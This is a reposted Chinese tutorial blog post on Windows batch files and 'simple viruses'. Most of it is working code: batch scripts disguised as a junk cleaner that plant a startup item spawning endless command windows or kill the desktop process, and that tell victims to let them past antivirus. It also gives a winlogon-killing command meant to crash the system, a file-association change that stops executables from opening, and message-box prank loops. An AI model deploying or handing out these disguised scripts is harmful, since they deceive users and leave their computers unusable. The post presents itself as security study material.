【CyberSecurityLearning 28】批处理与简单病毒
生活随笔
收集整理的這篇文章主要介紹了
【CyberSecurityLearning 28】批处理与简单病毒
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
批處理案例
@echo off color 0a title 飛哥小程序v1.0 :menu cls echo ========================== echo 菜單 echo 1、修改管理員密碼 echo 2、定時關機 echo 3、退出本程序 echo =========================== set /p num=您的選擇是: if "%num%"=="1" goto 1 if "%num%"=="2" goto 2 if "%num%"=="3" goto 3 echo 被鬧,好好輸! pause goto menu:1 set /p u=請輸入用戶名: set /p p=請輸入新密碼: net user %u% %p% >nul echo 您的密碼已經設置成功! pause goto menu:2 set /p time=請輸入時間: shutdown -s -t %time% set /p x=是否取消(1:是,0:否): if "%x%"=="1" shutdown -a goto menu pause:3 exit病毒
測試環境:虛擬機win2003
注:一些簡單的病毒程序請勿在真實機中測試
簡單的批處理文件一
功能:偽裝垃圾清理程序添加一個開機自啟動項,無限彈出CMD窗口
@echo off title 系統垃圾清理 color 2f echo =======若殺毒軟件惡意攔截,請選擇【允許程序的所有操作】======== echo. echo. echo :start >c:\windows\windows.bat echo start cmd>>c:\windows\windows.bat echo goto start>>c:\windows\windows.bat copy c:\windows\windows.bat "%USERPROFILE%"\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\" >nul if %errorlevel%==0 goto next errorlevel是預定義變量,為0時表示上面一條語句執行成功,非0反之 copy c:\windows\windows.bat "%USERPROFILE%\「開始」菜單\程序\啟動" >nul if %errorlevel%==1 goto error :next echo. echo. echo ====== 垃圾清理中,請不要關閉窗口====== echo. ping -n 5 127.0.0.1 >nul echo. echo ====== 垃圾清理完畢,共清理垃圾500M=== echo. echo. echo ====== 建議立即重啟電腦 pause goto ex:error echo. echo. echo ====== 程序運行失敗,請使用【管理員權限】重新運行!====== echo. pause goto ex:ex exit我們來看一下運行效果:
運行完成后我們可以看到在開始啟動項中多了一個windows.bat文件。
?
重啟之后,電腦完全死機了。
?
簡單的批處理文件二
功能:偽裝垃圾清理程序強制終止桌面進程
@echo off title 系統垃圾清理 color 2f echo ====== 若有殺毒軟件惡意攔截,請選擇【允許程序的所有操作】===== echo. echo.:next echo. echo. echo ====== 垃圾清理中,請不要關閉窗口======= echo. ping -n 5 127.0.0.1 >nul taskkill /im explorer.exe /f >nul 2>nul echo. echo. ===== 完了,你系統廢了====== ping -n 5 127.0.0.1>nul echo. start c:\windows\explorer.exe echo. echo ====== 已經修復好了!是不是嚇壞了!!嘿嘿========= pause桌面進程被殺死!
?
?桌面進程恢復:
?最簡單的藍屏炸彈文件
ntsd -c q -pn winlogon.ex分析:
ntsd? ? ? ?#殺死進程?
ntsd -c q -pn 進程名? ? ?#強制殺死進程
藍屏原因:winlogon 進程不能被殺死,我想強制殺死,系統不讓,結果導致藍屏!
對win2003有很大的殺傷力,但對win2008基本沒有殺傷力
最簡單的病毒
assoc.exe=txtfile分析:修改文件關聯,導致文件無法正常打開
?測試效果:
? ? ? ? ? ? ? ? ? ? ? ? ? ?
最簡單的病毒解藥
assoc.exe=exefile?只需將文件后綴與其關聯文對應即可
?
最簡單的腳本
方法:將.txt改為.vbs
msgbox "我最帥!"?測試效果:
? ? ? ? ? ? ? ? ? ? ? ? ? ?
最簡單的死循環腳本
domsgbox "我最帥!" 英文引號loop?測試:??
?? ? ? ?
?效果:窗口無法關閉
解決方法:
vbs 使用微軟自帶的wscript.exe來編寫的
一個有趣的小腳本,大家可以試試
do msgbox "飛哥最帥!" msgbox "小子,你對這件事有異議嗎" msgbox "你要為此付出代價" msgbox "從現在開始我要求你點100下鼠標" msgbox "100" msgbox "99" msgbox "98" msgbox "97" msgbox "96" msgbox "95" msgbox "94" msgbox "93" msgbox "92" msgbox "91" msgbox "90" msgbox "...." msgbox "3" msgbox "2" msgbox "1" msgbox "如果你看到這里,說明你確實很執著,你感動了我,請再點一下" msgbox "年輕人,有時候執著也沒用,換個姿勢再來一次" loop注:可以用修改圖標軟件修改vbs文件圖標
?整人網頁
<!DOCTYPE html> <html> <head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>很惡心的常見整人效果的代碼</title> </head> <body><a href="" onmouseover="alert('為什么把鼠標放到這里?'); alert('我不是說過不可用這樣嘛'); alert('飛哥現在真的很生氣'); alert('一點也不給飛哥面子'); alert('你把飛哥的話當什么了'); alert('你知道錯了嗎?'); alert('什么?你居然...'); alert('寫封信給我說對不起吧!'); alert('你能這么做我很欣慰!!!');">不許把鼠標移到這里!</a>點了真爽!!! </body> </html>參考:https://blog.csdn.net/weixin_43252204/article/details/105389619
?
?
?
?
總結
以上是生活随笔為你收集整理的【CyberSecurityLearning 28】批处理与简单病毒的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【2016年第6期】面向国际的生命组学大
- 下一篇: 第四届大数据科学与工程国际会议(2019